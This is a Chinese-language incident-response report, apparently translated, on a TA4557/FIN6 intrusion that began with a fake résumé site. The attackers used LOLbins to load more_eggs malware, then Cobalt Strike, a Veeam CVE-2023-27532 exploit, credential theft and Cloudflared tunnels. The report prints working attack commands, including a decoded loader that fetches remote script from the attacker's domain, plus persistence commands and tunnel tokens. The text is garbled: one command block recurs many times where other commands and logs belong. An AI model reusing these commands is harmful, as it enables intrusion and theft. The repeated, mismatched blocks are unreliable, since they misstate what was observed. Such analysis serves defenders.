点击蓝字 关注我们
关键要点总结
初始访问手段:攻击者通过伪装成求职简历的诱饵文件获取初始访问权限,该行动属于TA4557/FIN6系列攻击的一部分。 利用LOLbins:攻击者滥用LOLbins(Living Off the Land Binaries)工具,如 ie4uinit.exe和msxsl.exe,以运行more_eggs恶意软件。后期利用工具:攻击者使用了Cobalt Strike和基于Python的C2框架Pyramid进行后期利用活动。 漏洞利用:攻击者利用了CVE-2023-27532漏洞,对Veeam服务器进行攻击,从而实现横向移动和权限提升。 隧道流量:攻击者安装了Cloudflared,用于隧道化RDP流量的传输。 首次发布:该案例最早在2024年4月作为客户专属的《威胁简报》发布。 新增规则:根据此次报告,新增了8条规则并添加到我们的私有检测规则集中。
此报告的音频版可在Spotify、Apple、YouTube、Audible和Amazon等平台找到。
DFIR 报告服务概述
私密威胁简报:每年提供超过20份私密DFIR(数字取证与事件响应)报告。 威胁情报源:专注于追踪指挥与控制(C2)框架,如Cobalt Strike、Metasploit、Sliver等。 全面情报服务:涵盖私密威胁简报、威胁情报源,以及私密活动、威胁行为者洞察报告、长期追踪、数据聚类和其他精选情报。 私密Sigma规则集:包含150多条Sigma规则,这些规则基于50多个案例开发,并映射至ATT&CK框架,同时提供测试示例。 DFIR实验室:提供基于云的实战学习体验,使用真实入侵数据。实验室设有不同难度级别,支持按需访问,满足各种学习速度的需求。
案例摘要
2024年3月,在检测到恶意活动后展开了一次调查。分析表明,威胁行为者成功感染了一台用户终端设备,并以此为跳板渗透到了环境中的两台服务器。
威胁行为者通过提交一份带有简历诱饵的求职申请获得了访问权限。这次初始访问活动由Proofpoint观察到,并将其归因于他们追踪的TA4557组织。该组织的活动历史上与FIN6有重叠,并且在工具使用上与Cobalt Group和Evilnum存在相似之处。
受害者在求职通知中被引导到一个在线简历网站后,下载了一个伪装的简历压缩包,并运行了其中的恶意.lnk文件。攻击链随即启动,威胁行为者利用微软可执行文件ie4uinit.exe侧加载了一个恶意.inf文件。随后,该过程投放了一个恶意DLL,并通过WMI(Windows管理工具)执行。接着创建了一个计划任务,并通过另一个WMI进程使用微软的msxsl.exe加载恶意JScript脚本。这最终加载了more_eggs恶意软件,建立了与指挥与控制(C2)服务器的通信。
接下来,攻击者使用了微软的工具,如nltest、net和whoami,运行了一些初始的发现命令。在大约一天半的时间内,活动几乎停止,直到攻击者在滩头节点部署了Cobalt Strike。首先,攻击者通过vssadmin创建了卷影副本,这可能是为了尝试获取凭据。随后,他们使用微软工具进行了初步环境发现,并在系统上创建了一个新用户。
随后,攻击者使用了SharpShares和Seatbelt工具进一步枚举主机和环境。他们还尝试在滩头节点上部署Pyramid恶意软件,尽管部署过程困难重重,但Pyramid并未表现出明显的活动或与C2服务器的通信。在此之后,攻击者开始寻找横向移动的机会,并将目标对准了运行Veeam软件的备份服务器。他们利用了该服务器上的漏洞CVE-2023-27532,获得了访问权限,并创建了一个新的本地管理员账户。
利用新账户,攻击者通过RDP从滩头节点连接到备份服务器。在这一过程中以及后续的RDP操作中,攻击者泄露了多个主机名,这些主机名与其他最终部署了Fog勒索软件的入侵活动有关(根据Arctic Wolf的报告)。在备份服务器上,攻击者部署了Cobalt Strike载荷,并继续通过SharpShares、Seatbelt和AdFind工具进行发现活动。同时,他们在备份服务器上访问了LSASS内存以获取凭据。
之后,攻击者将目标转向第二台服务器,通过远程服务在该服务器上重复创建新本地管理员账户的过程。这一服务是使用域管理员账户创建的,表明此前的LSASS访问成功。攻击者接着检查了环境中的多个特权用户,并发现了一个被禁用的域管理员账户,随后将其重新启用。
在备份服务器上,攻击者通过浏览器访问了文件共享网站temp.sh,下载了一个包含Cloudflared安装程序的压缩包。运行压缩包中的MSI安装程序后,Cloudflared被作为服务安装在服务器上。攻击者随后使用RDP连接到第二台服务器,并重复了Cloudflared的安装过程。在第二台服务器上,攻击者创建了另一个新用户,并将其添加到本地管理员组。
接着,攻击者以新用户身份启动了一个新的RDP会话,并运行了SoftPerfect网络扫描器。在扫描完成后,攻击者打开了远程共享文件中的几个文件,当天的活动随即停止。
次日,攻击者返回并尝试ping远程网络上的一个主机。之后,他们移除了滩头节点上的more_eggs文件及持久化任务,与more_eggs C2服务器的通信也随之停止。尽管Cobalt Strike和Cloudflared隧道仍处于活动状态,但在攻击者被驱逐前没有观察到进一步的活动。
通过进一步的开源调查,发现该恶意简历活动使用了许多相同模板和图片的诱饵网站,这些网站的域名格式为<name>.com。
这场攻击活动仍在持续,诱饵网站或恶意软件投放的方式几乎没有明显变化。报告的“指标”部分中包含已识别的域名列表。
尽管more_eggs恶意软件和伪装成简历的诱饵早在2018年就被TA4557/FIN6使用,但此次活动似乎是在2023年末发起的。以下是对该活动的部分早期分析:
Proofpoint(https://www.proofpoint.com/uk/blog/threat-insight/security-brief-ta4557-targets-recruiters-directly-email) Trend Micro(https://www.trendmicro.com/en_us/research/24/i/mdr-in-action--preventing-the-moreeggs-backdoor-from-hatching--.html) eSentire(https://www.esentire.com/blog/more-eggs-activity-persists-via-fake-job-applicant-lures) Critical Start(https://www.criticalstart.com/recruiter-phishing-more-eggs-malware/)
分析师
分析与报告由以下人员完成:
@_pete_0 Zach Stanford(又名 @svch0st) 特邀贡献者:Kelsey Merriman(又名 @k3dg3,来自Proofpoint)
初始访问
Proofpoint自2018年以来一直追踪TA4557这一技术娴熟、以财务为动机的威胁行为者。该组织以分发独家后门程序more_eggs而闻名,该后门能够分析终端设备并发送额外的恶意载荷。
TA4557与其他高优先级威胁行为者的显著区别在于其以下特点:
独特的工具和恶意软件使用:例如more_eggs后门的专用性。 精准的活动目标:以特定行业或组织为主要攻击对象。 求职者主题的诱饵:利用简历和招聘信息作为初始攻击入口。 高超的规避技术:有效绕过检测和安全措施。 独特的攻击链:操作流程复杂且具有针对性。 显著的基础设施模式:包括其独特的域名和网络行为特征。
在2024年,Proofpoint观察到TA4557在针对招聘流程相关员工时,采用了多种投递策略,包括:
直接发送邮件引导访问恶意简历网站 攻击者直接向员工发送邮件,其中包含指导收件人导航到以简历为主题的网站的指令,最终导致恶意软件的投递。为了避免安全工具识别邮件正文中的域名,攻击者采用了多种规避方法,例如在顶级域名(TLD)前添加空格或下划线,以躲避自动化分析。 发送普通邮件后再回复恶意邮件 攻击者先向员工发送内容正常的邮件,并等待回复,然后通过回复邮件提供包含指导用户导航到恶意简历网站的指令,最终导致恶意软件投递。攻击者还伪装成求职者,通过各种招聘网站申请真实的职位发布,并上传带有指令的简历,诱导用户访问伪造的求职者网页。 通过求职网站的通知邮件传递攻击 2024年3月,Proofpoint观察到攻击者使用第三种方法,通过一封来自招聘网站的通知邮件告知用户有新的求职者(TA4557)申请了用户发布的职位。Proofpoint的入侵文件和诱饵网站与此次活动完全吻合。
在此次入侵中,我们通过解析用户的Edge浏览器SQLite数据库,成功追踪到恶意载荷的来源及其执行路径。
用户从域名johnshimkus[.]com下载了名为John Shimkus.zip的文件。当用户点击“下载简历”(Download CV)按钮时,网站会显示一个验证码,并在我们进一步分析网站时生成一个唯一的下载链接。
当使用Linux用户代理访问该网站时,网站会返回一个普通的文本格式简历,而不是下载链接,以规避分析工具的检测。
相同的网站模板和库存图片也被用于TA4557的攻击活动中,Proofpoint对此进行了以下报道:
执行
受害者解压缩该ZIP文件后,点击了名为John-_Shimkus.lnk的Windows快捷方式文件,从而触发了感染流程。
值得注意的是,压缩包中与恶意载荷一起的2.jpg图片并未被恶意软件使用。我们推测它可能是用于“填充”压缩包,以降低被检测的可能性。
在执行Windows快捷方式文件后,触发了一系列执行步骤,具体内容将在下文详细讨论。
从.lnk文件入手,我们解析了该文件,发现其中包含一个长长的混淆参数。
解码cmd.exe参数后,生成了以下命令,该命令将文本输出到ieuinit.inf文件中:
(for %%a in ("[089F]" "sc" "ro%%Clarify%%j,NI,%%Serious%%%%Departments%%%%Departments%%p%%Jaguar%%%%Groups%%%%Groups%%a92837f.johnshimkus.%%Questions%%/setthevar" "[strings]" "Questions=com" "Groups=/" "Clarify=b;Proud" "Jaguar=:;Creatures" "Serious=h" "Danger=%%time%%" "Defines=init" "shortsvcname=' '" "Departments=t;Toast" "servicename=' '" "[destinationdirs]" "defaultdestdir=11" "824=01" "[defaultinstall.windows7]" "Un" "Register" "OCXs=089F" "delfiles=824" "[824]" "ieu%%Defines%%.inf" "[version]" "signature$windows nt$" ) do @echo %%~a) > "%%appdata%%microsoftieuinit.inf"
随后,将合法的二进制文件ie4uinit.exe复制到自定义位置,同时设置了一些额外的环境变量。
call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%%appdata%%microsoft*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%microsoftie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
在跳板主机的进程活动中,这部分命令显示如下:
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
滥用 ie4uinit.exe(LOLBin)
该流程利用了ie4uinit.exe的已知执行劫持机制(详见:https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/)。通过向ie4uinit.exe提供“侧加载”的.inf文件,可以使其从远程服务器加载并执行COM脚本文件(SCT)。在此次案例中,攻击行为者访问了以下URL:
hxxp://a92837f.johnshimkus[.]com/setthevar
从主机的ie4uinit.exe进程发起的DNS查询中,可以观察到以下记录:
结合Suricata规则,可以检测到以下活动:
我们还可以通过Prefetch(预取文件)确认ie4uinit.exe与恶意的ieuinit.inf文件进行了交互:
More_Eggs
在ie4uinit.exe执行后不久,名为20350.dll的DLL文件被投放到AppData文件夹中。随后,进程wmiprvse.exe生成了以下命令:
regsvr32 /s /n /i:Action "C:Users<user>AppDataRoamingMicrosoft20350.dll"
该DLL文件生成了一些.txt文件以及合法的MSXSL可执行文件,这些文件被用于下一阶段的执行流程:
C:ProgramDataMicrosoft51D7701F6EB775C7.txt (XML - Schtask)
C:ProgramDataMicrosoft29D88F75006BE8A.txt (XML - more_eggs script)
C:ProgramDataMicrosoft178F2E426.txt
C:ProgramDataMicrosoftmsxsl.exe (Legitimate Binary)
随后,攻击链利用schtasks命令为more_eggs恶意软件设置了持久化机制。
schtasks /Create /TN "8766714F94DD" /XML "C:ProgramDataMicrosoft51D7701F6EB775C7.txt"
滥用msxsl.exe部署more_eggs
more_eggs的载荷最终通过msxsl.exe二进制文件加载,利用了该工具的已知技术(详见:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/):
C:ProgramDataMicrosoftmsxsl.exe 29D88F75006BE8A.txt 29D88F75006BE8A.txt
提供给msxsl.exe的文件29D88F75006BE8A.txt是一个经过混淆处理的JScript脚本,用于加载more_eggs恶意软件。
执行后,more_eggs恶意软件持续运行以下命令:
typeperf.exe "SystemProcessor Queue Length" -si 180 -sc 1
Typeperf 是微软的一个工具,用于从指定的性能计数器中收集性能数据。在本案例中,处理器队列长度(Processor Queue Length)显示处理器中排队等待执行的线程数量。
** -si**:表示采样间隔(单位为秒),此处为3分钟(180秒)。** -sc**:表示采样次数,即收集的样本总数。
在整个入侵过程中,由于每次采样间隔为3分钟,根据每小时60分钟除以3分钟间隔,该工具每小时生成大约20个新进程创建事件。
在初始感染后的一天半时间里,威胁行为者通过regsvr32.exe部署了Cobalt Strike Beacon:
regsvr32.exe /s /n /i "C:ProgramData31765.ocx"
该.OCX文件是一个未签名的DLL文件,大小为230KB。
持久性
more_eggs
在最初执行more_eggs时,运行了一个计划任务命令:
schtasks /Create /TN "8766714F94DD" /XML "C:ProgramDataMicrosoft51D7701F6EB775C7.txt"
schtasks命令使用了/XML标志,指向了威胁行为者投放的一个文本文件。根据微软文档,/XML标志的作用是:
尽管该文件使用了文本扩展名,但实际上是一个为持久化准备的预设任务。该任务使用了启动触发器(Boot Trigger),在主机重启后重新启动恶意软件。
任务中的命令参数指向磁盘上的一个文件178F2E426.txt,其内容为:
解码后可以看到,该脚本会执行msxsl.exe以及伪装成文本文件的more_eggs脚本文件。
Cloudflared
在备份服务器上,威胁行为者使用Internet Explorer从文件共享网站temp.sh下载了一个名为cloudflared.zip的压缩文件。通过分析WebCacheV01.dat文件,可以看到Internet Explorer进程写入了该文件,同时提取了用户下载的URL。
随后,威胁行为者通过MSI安装程序在环境中的两台主机上安装了Cloudflared工具。Cloudflared是一种可以通过Cloudflare服务实现流量隧道化的工具。这使得威胁行为者能够通过隧道代理访问目标网络的私有资源。
call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%%appdata%%microsoft*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%microsoftie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
1| 服务器 | 命令行 | 解码后的配置(部分示例文本) |
|---|---|---|
| 备份服务器 | cloudflared-windows-amd64.exe service install eyJJ9 | {“a”:”ddce269a1e3d054cae349621c198dd52”, “t”:”e8c8cb73-248f-4b39-9cf9-c6fb3b89edb9”, “s”:”AMYNzTjTCQQtlLE5j0ZY4zDYMwxj2wAMZTzQYUOjYZzMh0ty”} |
| 应用服务器 | cloudflared.exe service install eyJJ9 | {“a”:”ddce269a1e3d054cae349621c198dd52”, “t”:”35575e50-eae2-4d40-bcee-5a1986b0df1e”, “s”:”TYWmL3jYjMZMAwN3NMZBU3iMEMZ0mTJztgNhEW1jODMTG0tx”} |
MSI安装程序及后续命令会将服务安装为Cloudflared代理(系统事件ID 7045),并将启动类型设置为自动启动,从而通过代理建立的隧道实现持久化访问。
安装Cloudflared后,会在应用程序日志中记录相关的Windows事件。其中,Cloudflared服务启动和隧道建立的事件会以事件ID 1(Cloudflared)记录下来。
随后是隧道建立的过程:
创建账户
在此次入侵中,威胁行为者创建了四个不同的用户账户。其中,三个为本地用户,并被添加到主机的本地管理员组;另一个账户被添加到域和域管理员组。所有账户均通过net.exe命令创建,但命令的触发方式多种多样,包括本地命令行、应用漏洞利用以及远程服务等方式。
在此次入侵中观察到的用户名包括:
| 用户名 | 范围 | 主机 | 执行方式 |
|---|---|---|---|
| backup | 本地 | 滩头主机 | 从Cobalt Strike触发的本地命令行 |
| sqlbackup | 本地 | 备份服务器 | 利用漏洞 |
| sqlbackup | 本地 | 管理服务器 | 通过远程服务 |
| adm_1 | 域 | 管理服务器 | 从交互式RDP会话触发的命令行 |
权限提升
攻击者随后使用了一个修改版的 VeeamHax 工具(https://github.com/sfewer-r7/CVE-2023-27532),该工具利用了CVE-2023-27532漏洞。以下是我们观察到的反编译版本与原始源码的对比。
主要修改点是允许将任意SQL命令作为参数传递,并在Veeam目标上进行评估和执行。这使得攻击者能够灵活地执行恶意操作,包括权限提升和数据访问。
–cmd 参数通过硬编码的xp_cmdshell命令执行。在此次案例中,可以看到威胁行为者使用了VeeamHax漏洞工具原始版本中的默认值,即c:windowsnotepad.exe。
该命令最终在目标SQL服务器上执行,但并未对攻击者的实际目标起到作用。notepad.exe进程仅用于概念验证(Proof of Concept)。在这种执行上下文中,Notepad.exe被视为一个无害进程,不会引发任何恶意活动。
脚本中的–sql参数是攻击者自定义添加的功能,允许将任意SQL命令传递给漏洞工具进行利用。
威胁行为者使用其自定义版本的VeeamHax.exe运行了以下命令,通过启用xp_cmdshell功能,随后创建了一个本地管理员账户sqlbackup,密码为Password!1221!。
call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%%appdata%%microsoft*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%microsoftie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
2VeeamHax.exe二进制文件中包含开发者的程序数据库(PDB)字符串如下:
call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%%appdata%%microsoft*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%microsoftie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
3在备份服务器上,我们观察到由MSSQL进程执行的net命令。
call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%%appdata%%microsoft*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%microsoftie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
4安全事件日志记录了本地账户创建的事件,事件ID为4720。
SQL Server 相关的 Windows 应用程序事件 ID 与启用 xp_cmdshell 后执行 cmd 的操作相关,通常会连续出现两个事件 ID 15457:
第一个事件与启用 xp_cmdshell 相关:
紧接着是 xp_cmdshell 执行的事件:
有效载荷失败
尽管 VeeamHax.exe 进程成功执行,但在 Windows 应用程序事件日志中以 Event ID 1000 记录了应用程序崩溃事件(提供者:应用程序错误)。这表明漏洞利用程序未能妥善处理异常错误,导致应用程序崩溃。
并伴随有一个“.Net 运行时”错误:
攻击者在多次执行该进程时,每次都观察到多个应用程序错误事件,从而生成了相关的 Windows 错误报告事件 ID 1001(提供者:Windows 错误报告)。
由应用程序调用的 WerFault 进程表示该应用程序异常终止。在短时间内,攻击者进行了多次利用尝试。
规避防御
攻击者在整个入侵过程中多次从主机上删除文件和痕迹。例如,more_eggs payload 在执行后删除了自己的 DLL 文件。
这种行为贯穿了整个入侵过程。
在入侵过程中,攻击者转移到备份服务器后,我们观察到Windows Defender被禁用的日志事件。由于未观察到与此相关的进程事件,我们推测此操作是攻击者通过RDP会话在图形界面中执行的。
命名管道(Named Pipes)
在Cobalt Strike的regsvr32进程中,我们观察到了使用默认的Cobalt Strike命名管道。
观察到的管道:
call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%%appdata%%microsoft*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%microsoftie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
5凭据访问
在备份服务器的RDP会话中,攻击者打开了 powershell_ise.exe 并运行了脚本 Veeam-Get-Creds.ps1(https://github.com/sadshade/veeam-creds/blob/main/Veeam-Get-Creds.ps1)。
PowerShell操作日志中的事件ID 4103和4104记录了脚本的输出,显示攻击者成功从Veeam数据库中提取了一个管理员密码。
在备份服务器上,LSASS进程通过RunDll32(Cobalt Strike)信标进行访问,使用了一个广为人知的“已授予访问”模式,值为0x1010,即 PROCESS_QUERY_LIMITED_INFORMATION(0x1000)和 PROCESS_VM_READ(0x0010)。
我们还观察到,RunDll32进程与其他进程(如cmd.exe和RunDll32.exe)进行了交互,使用了SYSTEM帐户、被攻陷的域管理员帐户以及新创建的本地帐户。
系统恢复
在受感染主机上,观察到使用了微软工具 VSSADMIN(卷影复制服务),首先列出配置的影像,然后创建了一个新的影像。似乎攻击者在执行该命令时遇到了问题,并且通过额外调用 ‘cmd’ 进行重试。
call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%%appdata%%microsoft*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%microsoftie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
6我们并没有观察到与创建的影像副本进行任何交互。尚不清楚攻击者为什么会启动此命令。一种假设是,创建影像卷的目的是通过本地保存的存储(例如SAM注册表文件,因为这不是域控制器)提取凭证。
在多个红队教程中,详细描述了一个相同的“vssadmin”命令(https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-domain-controller-hashes-via-wmic-and-shadow-copy-using-vssadmin)。
信息发现
初步发现行为大约在恶意软件初次执行后的10分钟开始。攻击者使用了标准的Windows工具:
call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%%appdata%%microsoft*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%microsoftie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
7攻击者随后使用Cobalt Strike信标执行了多个其他的发现命令:
call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%%appdata%%microsoft*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%microsoftie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
8我们怀疑攻击者正在使用Cobalt Strike信标的execute-assembly功能,因为有多个rundll32.exe进程实例,其中注入了DotNet代码。
受害组织正在记录某些关键的ETW(事件跟踪提供程序),这使我们能够捕获到攻击者加载的某些模块。以下记录显示了攻击者使用了已知的枚举工具Seatbelt和SharpShares。
call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%%appdata%%microsoft*" | set Pupils59=Seats && start "" wmic process call create "%%appdata%%microsoftie4uinit.exe -basesettings" | set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Congress Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot"
9这些工具的执行生成了文件seatinfo.txt和share.txt,攻击者随后在主机上查看了这些文件。
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
0在非托管代码进程(例如 RunDLL32)中调用 SharpShares 或 SeatBelt(这两者都是 .NET/托管应用程序)会导致创建一个公共语言运行时(CLR)使用日志文件,作为副作用。
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
1对于像 RunDLL32.exe 这样的进程,存在此文件表明一个 .NET 编译的有效载荷已被执行。在这种情况下,我们可以将此活动与 execute-assembly 事件进行关联。
一旦攻击者能够访问备份服务器,他们便运行了 adfind.exe 来收集更多关于域的信息:
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
2攻击者执行了网络检查,使用了 route print 命令,随后创建了以下文件:C:ProgramDatascaner.zip。不久后,攻击者解压该文件并执行了 SoftPerfect Netscan 工具。
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
%WINDIR%system32cmd.exe /S /D /c" set "Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Young Estates Advisors Presents Calls Subscriptions Replies Rangers Con
Quote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Surplus Double Diabetes Centuries Stadium Unveil Input Segment Databases
Disabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spike Watches Pilot""
wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings"
%APPDATA%microsoftie4uinit.exe -basesetting
3在该压缩文件的内容中,我们观察到至少有五个其他受害环境的先前保存的扫描记录。
以下是与 netscan.exe 一同出现的许可证文件内容:
%WINDIR%system32cmd.exe /S /D /c" call xcopy /Y /C /Q %%windir%%system32ie4uinit.exe "%APPDATA%microsoft*" "
%WINDIR%system32cmd.exe /S /D /c" set Pupils59=Seats "
xcopy /Y /C /Q %WINDIR%system32ie4uinit.exe "%APPDATA%microsoft*"
%WINDIR%system32cmd.exe /S /D /c" start "" wmic process call create "%APPDATA%microsoftie4uinit.exe -basesettings" "
